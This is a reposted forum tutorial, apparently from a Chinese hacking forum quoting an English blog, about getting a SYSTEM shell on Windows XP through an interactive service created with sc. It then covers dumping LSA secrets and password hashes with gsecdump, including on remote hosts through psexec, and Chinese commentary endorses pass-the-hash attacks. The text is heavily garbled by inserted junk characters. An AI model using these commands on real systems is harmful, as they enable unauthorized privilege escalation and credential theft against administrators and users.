o get a DOS Prompt as NT system:8 k3 f2 ^0 C/ t2 ~6 d7 n
t2 `9 {: b: T9 O( S; b, @+ XC:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact$ X' U$ z, f3 ~! B0 S
[SC] CreateService SUCCESS5 o1 i( F( A5 T! Z$ y- X* m
K$ p, E( g T
C:\>sc start shellcmdline
9 C/ o6 p" O; i3 x[SC] StartService FAILED 1053:
( i1 F/ B2 ~5 B' B( [. ^ Z( E" |: K3 r: [/ |
The service did not respond to the start or control request in a timely fashion.$ @6 J5 S5 Q7 x! l" S
5 d- G1 Q5 x& q+ s/ D' {C:\>sc delete shellcmdline* f; f0 D% M3 e
[SC] DeleteService SUCCESS
; O( t9 M3 s4 j( F+ q _( |$ d) s; Q# K l8 ?% j
------------' @0 ^2 q. V% y( ]
6 Z6 i6 H( V; v2 Z Z7 B9 DThen in the new DOS window:! Z& M+ c I9 ^4 h' o
1 B4 C3 f# ~9 XMicrosoft Windows XP [Version 5.1.2600]0 t0 A3 ?7 p( A8 e
(C) Copyright 1985-2001 Microsoft Corp.
1 K$ x; f4 J0 ?3 @5 C
7 A9 R t) h3 U7 g A+ dC:\WINDOWS\system32>whoami
) {5 H7 P2 C% @- t7 |NT AUTHORITY\SYSTEM
7 i! {1 z# C4 J! y! r- ]6 {8 j6 v" Y! Q8 n1 ~
C:\WINDOWS\system32>gsecdump -h. l7 I" j7 R( z8 `" B
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
2 _8 t$ q$ u L7 y; q! fusage: gsecdump [options]
1 s1 X: U$ Q, N5 J7 Q6 g- w+ S2 E5 H, k O: h+ G6 _
options:; C4 }0 ?5 ^' g! k* T( e" T @
-h [ --help ] show help
: @3 [- t1 ^1 ]9 p1 j! i-a [ --dump_all ] dump all secrets* J! D8 b0 i! }- n) @% D: I
-l [ --dump_lsa ] dump lsa secrets& G7 s% g4 c7 c" c) |0 t- L+ s
-w [ --dump_wireless ] dump microsoft wireless connections7 Q4 n, d' z/ k: @
-u [ --dump_usedhashes ] dump hashes from active logon sessions
9 X! c6 p f3 C! Z-s [ --dump_hashes ] dump hashes from SAM/AD: O* J. _7 {. b& D1 k+ O( Y1 ?
1 _5 H+ G8 i+ ?! s$ n
Although I like to use:, g9 {* _; p0 g& M" c/ z. [
+ v3 C7 D/ N+ ]
PsExec v1.83 - Execute processes remotely( J% X- F& E" O6 o5 m& U
Copyright (C) 2001-2007 Mark Russinovich1 X# D+ M1 s3 J. R
Sysinternals - 链接标记[url]www.sysinternals.com[/url]
! Z) H+ o" M9 G6 d7 h3 t ^+ V4 E4 |( u7 L
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT; K; p# h; M) m$ Z% D1 J' K
/ [! P ]. \2 _0 Nto get the hashes from active logon sessions of a remote system.
. a" |- ~; O( N- ?2 t
7 N3 X$ p2 ^& N1 B1 u$ M ?These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.1 V; T* h4 H% W$ }" ^" Z
/ T/ p f* n1 _4 N. ]5 T提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
/ E7 o: o& P8 ?3 F& Z3 d原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
# i4 A/ q- v. F. ^
2 n& |7 P1 a: K5 |5 g& F我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
- N, f8 K7 s3 m1 y/ t |